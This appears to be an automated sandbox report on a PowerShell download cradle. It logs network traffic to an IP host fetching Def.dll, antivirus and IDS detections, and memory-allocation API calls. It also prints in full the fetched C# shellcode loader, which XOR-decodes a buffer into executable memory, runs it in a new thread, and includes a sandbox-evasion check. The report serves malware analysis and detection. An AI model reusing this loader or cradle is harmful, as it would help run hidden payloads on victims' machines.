Summary | ZeroBOX

download_cradle.ps1

Generic Malware Antivirus
Category: FILE
Machine: s1_win7_x6401
Started: April 28, 2025, 8:57 a.m.
Completed: April 28, 2025, 9:03 a.m.
Size 248.0B
Type ASCII text
MD5 bfe7652f5d2f9fee4948d1c055e40d7b
SHA256 a0e57df75b8b6acc6f9225dd5fa66c8ad3f46b17c77e7de015e84378928ae01e
CRC32 88B1A91B
ssdeep 6:0NpzX3oSgUUoqIiag1L3ppNolltWUXRR2juHTuAs:0X9RUo2agd3pjnUhRds
Yara None matched

Name / Response / Post-Analysis Lookup: No hosts contacted.
IP Address: 15.160.116.14, Status: Active, Action: Moloch

Suricata Alerts

Flow: TCP 192.168.56.101:49164 -> 15.160.116.14:80
SID: 2027250
Signature: ET INFO Dotted Quad Host DLL Request
Category: Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception calling "Load" with "1" argument(s): "Could not load file or assembly
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: '5282 bytes loaded from System.Management.Automation, Version=1.0.0.0, Culture
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: =neutral, PublicKeyToken=31bf3856ad364e35' or one of its dependencies. An attem
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: pt was made to load a program with an incorrect format."
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At C:\Users\test22\AppData\Local\Temp\download_cradle.ps1:2 char:44
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + $assem = [System.Reflection.Assembly]::Load <<<< ($data)
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: You cannot call a method on a null-valued expression.
console_handle: 0x00000097
1 1 0

WriteConsoleW

buffer: At C:\Users\test22\AppData\Local\Temp\download_cradle.ps1:3 char:24
console_handle: 0x000000a3
1 1 0

WriteConsoleW

buffer: + $class = $assem.GetType <<<< ("ClassLibrary1.Class1")
console_handle: 0x000000af
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (GetType:String) [], RuntimeEx
console_handle: 0x000000bb
1 1 0

WriteConsoleW

buffer: ception
console_handle: 0x000000c7
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : InvokeMethodOnNull
console_handle: 0x000000d3
1 1 0

WriteConsoleW

buffer: You cannot call a method on a null-valued expression.
console_handle: 0x000000f3
1 1 0

WriteConsoleW

buffer: At C:\Users\test22\AppData\Local\Temp\download_cradle.ps1:4 char:27
console_handle: 0x000000ff
1 1 0

WriteConsoleW

buffer: + $method = $class.GetMethod <<<< ("runner")
console_handle: 0x0000010b
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (GetMethod:String) [], Runtime
console_handle: 0x00000117
1 1 0

WriteConsoleW

buffer: Exception
console_handle: 0x00000123
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : InvokeMethodOnNull
console_handle: 0x0000012f
1 1 0

WriteConsoleW

buffer: You cannot call a method on a null-valued expression.
console_handle: 0x0000014f
1 1 0

WriteConsoleW

buffer: At C:\Users\test22\AppData\Local\Temp\download_cradle.ps1:5 char:15
console_handle: 0x0000015b
1 1 0

WriteConsoleW

buffer: + $method.Invoke <<<< (0, $null)
console_handle: 0x00000167
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (Invoke:String) [], RuntimeExc
console_handle: 0x00000173
1 1 0

WriteConsoleW

buffer: eption
console_handle: 0x0000017f
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : InvokeMethodOnNull
console_handle: 0x0000018b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x06001738
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x06001738
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x06001738
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x06001738
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x06001738
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x06001738
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
suspicious_features: GET method with no useragent header, Connection to IP address
suspicious_request: GET http://15.160.116.14/Def.dll
request: GET http://15.160.116.14/Def.dll
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0220b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0272f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01de9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05610000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f82000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02729000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x054b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x054b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 1966080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06580000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06720000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06721000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06722000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06723000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06724000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06330000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06331000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06332000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06333000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06334000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x054b8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06335000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Symantec ISB.Downloader!gen285
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received
HTTP/1.1 200 OK
Date: Mon, 28 Apr 2025 00:01:22 GMT
Server: Apache/2.4.63 (Debian)
Last-Modified: Sun, 23 Mar 2025 22:08:06 GMT
ETag: "14a2-63109b8e3c78b"
Accept-Ranges: bytes
Content-Length: 5282
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program

Response body (C# source text served as application/x-msdos-program; the 560-byte XOR-encoded buffer has been omitted):

using System;
using System.Runtime.InteropServices;

namespace ClassLibrary1
{
    public class Class1
    {
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
        [DllImport("kernel32.dll")]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
        [DllImport("kernel32.dll")]
        static extern uint WaitForSingleObject(IntPtr Handle, uint dwMilliseconds);
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect, uint nndPreferred);
        [DllImport("kernel32.dll")]
        static extern IntPtr GetCurrentProcess();
        [DllImport("kernel32.dll")]
        static extern void Sleep(uint dwMilliseconds);

        public static void Main(string[] args)
        {
            // Call the Runner method
            runner();
        }

        public static void runner()
        {
            IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
            if (mem == null) { return; }
            byte[] buf = new byte[560] { /* 560 XOR-encoded bytes omitted */ };
            for (int i = 0; i < buf.Length; i++) { buf[i] = (byte)(((uint)buf[i] ^ 0xAA) & 0xFF); }
            int size = buf.Length;
            IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
            Marshal.Copy(buf, 0, addr, size);
            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
        }
    }
}
Data sent GET /Def.dll HTTP/1.1 Host: 15.160.116.14 Connection: Keep-Alive
host 15.160.116.14
Time & API Arguments Status Return Repeated

send

buffer: GET /Def.dll HTTP/1.1 Host: 15.160.116.14 Connection: Keep-Alive
socket: 1536
sent: 70
1 70 0